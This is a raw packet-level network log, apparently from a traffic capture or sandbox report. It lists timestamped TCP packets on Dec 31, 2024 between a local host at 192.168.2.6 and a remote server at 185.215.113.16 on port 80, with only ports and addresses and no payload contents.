Dec 31, 2024 09:48:39.135206938 CET	80	49748	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:39.771985054 CET	49748	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.775325060 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.780133963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:39.780220032 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.780358076 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.785173893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472445011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472482920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472491980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472507954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472518921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472528934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472538948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472559929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472569942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472572088 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.472580910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.472629070 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.477416992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.477430105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.477441072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.477478027 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.521696091 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.597651958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597670078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597681046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597759008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.597804070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597815037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597826004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.597855091 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.597872972 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.598189116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598201036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598206997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598239899 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598241091 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.598251104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598289967 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.598927975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598938942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598948956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598965883 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.598978996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.598989010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.598989010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599014997 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.599854946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599868059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599878073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599886894 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599898100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.599912882 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.599931955 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.600639105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.600652933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.600675106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.602644920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.602678061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.602726936 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.722510099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722523928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722578049 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.722729921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722740889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722752094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722762108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722767115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.722798109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.722937107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722984076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.722995996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723016024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723016977 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723026037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723042965 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723160982 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723170996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723181009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723192930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723201990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723207951 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723212004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723222017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723236084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723588943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723598957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723608971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723622084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723648071 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723792076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723803043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723813057 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723833084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723860979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723871946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723881006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723891020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.723895073 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.723918915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724353075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724363089 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724374056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724385977 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724407911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724407911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724419117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724428892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724438906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724453926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724481106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724490881 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724499941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724510908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724519014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.724531889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.724556923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.725253105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725264072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725275993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725281000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725286007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725291014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725296974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725301981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725306988 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725311995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.725435972 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.727392912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.771711111 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.847801924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.847815990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.847826004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.847865105 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848047972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848058939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848069906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848095894 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848098993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848109961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848115921 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848119974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848131895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848140955 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848166943 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848191023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848239899 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848249912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848259926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848299980 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848300934 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.848465919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848476887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848486900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.848510027 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.896692991 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.974817991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974833965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974884033 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.974921942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974932909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974942923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974960089 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.974988937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.974999905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975009918 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975022078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975047112 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975065947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975075960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975114107 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975186110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975195885 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975205898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975217104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975229025 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975244999 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975384951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975450039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975460052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975470066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975491047 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975521088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975521088 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975531101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975541115 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975553036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975564957 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975585938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975626945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975832939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975842953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975852966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975871086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975879908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975889921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975894928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975899935 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975904942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975925922 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975969076 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.975984097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.975994110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976003885 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976016045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976027012 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976043940 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976406097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976489067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976497889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976509094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976519108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976522923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976528883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976537943 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976569891 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976576090 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976586103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976596117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976605892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976634979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976679087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976690054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976700068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976710081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976720095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976728916 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976733923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.976739883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.976759911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977387905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977397919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977407932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977438927 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977458954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977463007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977469921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977480888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977503061 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977530003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977540016 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977550030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977560043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977567911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977602959 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977643967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977654934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977663994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977674007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977684021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977684975 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977694035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977701902 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977705956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.977718115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.977735996 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978343964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978353977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978364944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978375912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978391886 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978406906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978410959 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978418112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978455067 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978471994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978482008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978492022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978502035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978522062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978549004 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978591919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978600979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978610992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978621006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978631020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978641033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978645086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.978652954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.978677034 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.979307890 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.979326010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.979336023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.979341984 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:40.979345083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:40.979357004 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.021687031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071616888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071633101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071645021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071667910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071680069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071682930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071690083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071702003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071722031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071753025 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071772099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071782112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071793079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071800947 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071801901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071813107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071822882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071831942 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071834087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071858883 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071907997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071918011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071928024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071938038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071948051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071958065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071968079 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071975946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071985960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.071986914 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.071999073 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072026014 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072042942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072052956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072062969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072072983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072082996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072089911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072098017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072108984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072113991 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072118998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072129965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072130919 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072161913 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072325945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072335005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072345972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072355986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072356939 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072365999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072374105 CET	49754	80	192.168.2.6	185.215.113.16
